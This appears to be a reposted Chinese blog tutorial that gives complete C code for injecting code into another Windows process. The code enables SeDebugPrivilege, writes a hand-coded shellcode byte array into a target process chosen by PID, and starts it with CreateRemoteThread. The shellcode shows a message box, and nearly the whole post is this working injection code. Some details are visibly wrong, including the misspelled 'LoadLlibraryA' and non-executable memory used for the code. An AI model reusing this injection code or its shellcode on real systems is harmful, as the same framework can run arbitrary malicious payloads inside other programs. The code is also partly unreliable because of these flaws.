您的位置:首页 > 运维架构 > Shell

Windows线程注入——弹窗ShellCode

2015-01-16 21:15 148 查看
进行程序线程注入的代码,执行一个弹窗的ShellCode。在Win7 64位之前可以完美运行,但是Win7 64位下插入的代码因为安全机制的原因无法执行,会报错!

#include <windef.h>
#include <MSCorEE.h>
#include <stdio.h>
typedef struct _THREAD_PARA
{
FARPROC pFunc[2];
}THREAD_PARAM, *PTHREAD_PARAM;

BYTE SHELLCODE[] =
{
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x0C\x8B\x09\x8B\x09\x8B\x69\x18\xAD\x3D\x6A\x0A\x38\x1E\x75"
"\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD"
"\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE"
"\x06\x3A\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24"
"\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03"
"\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9"
"\x33\xDB\x53\x68\x74\x20\x00\x00\x68\x69\x6b\x61\x73\x68\x53\x61"
"\x6e\x64\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x8B\xE6\xC3"
};

void EnableDebugPriv()   //由于是要注入到别的进程,所有要有一个提权操作
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
if ( !OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) )
return;
if ( !LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue) )
{
CloseHandle(hToken);
return;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if ( !AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof tkp, NULL, NULL) )
{
CloseHandle(hToken);
}
}
BOOL InjectCode(DWORD dwPID)
{
HMODULE     hMod           = NULL;
THREAD_PARAM param      = {0,};
HANDLE     hProcess      = NULL;
HANDLE     hThread      = NULL;
LPVOID pRemoteBuf[2] = {0,};

hMod = GetModuleHandleA("Kernel32.dll");

param.pFunc[0] = GetProcAddress(hMod, "LoadLlibraryA");
param.pFunc[1] = GetProcAddress(hMod, "GetProcAddress");

hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID);

pRemoteBuf[0] = VirtualAllocEx(hProcess,
NULL,
sizeof(THREAD_PARAM),
MEM_COMMIT,
PAGE_READWRITE);

WriteProcessMemory(hProcess,
pRemoteBuf[0],
(LPVOID)¶m,
sizeof(THREAD_PARAM),
NULL);

pRemoteBuf[1] = VirtualAllocEx(hProcess,
NULL,
sizeof(SHELLCODE),
MEM_COMMIT,
PAGE_READWRITE
);

WriteProcessMemory(hProcess,
pRemoteBuf[1],
(LPVOID)&SHELLCODE,
sizeof(SHELLCODE),
NULL);

hThread = CreateRemoteThread(hProcess,
NULL,
0,
(LPTHREAD_START_ROUTINE)pRemoteBuf[1],
pRemoteBuf[0],
0,
NULL);
WaitForSingleObject(hThread, INFINITE);

CloseHandle(hThread);
CloseHandle(hProcess);
return TRUE;
}

int main(int argv, char* args[])
{
EnableDebugPriv();
DWORD PID = atoi(args[1]);
if(PID!=0)
{
printf("Inout Pid = %d\n",PID);
InjectCode(PID);
}
else
printf("Input ERROR!");
return 0;
}
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: 
相关文章推荐
新的分享
章节导航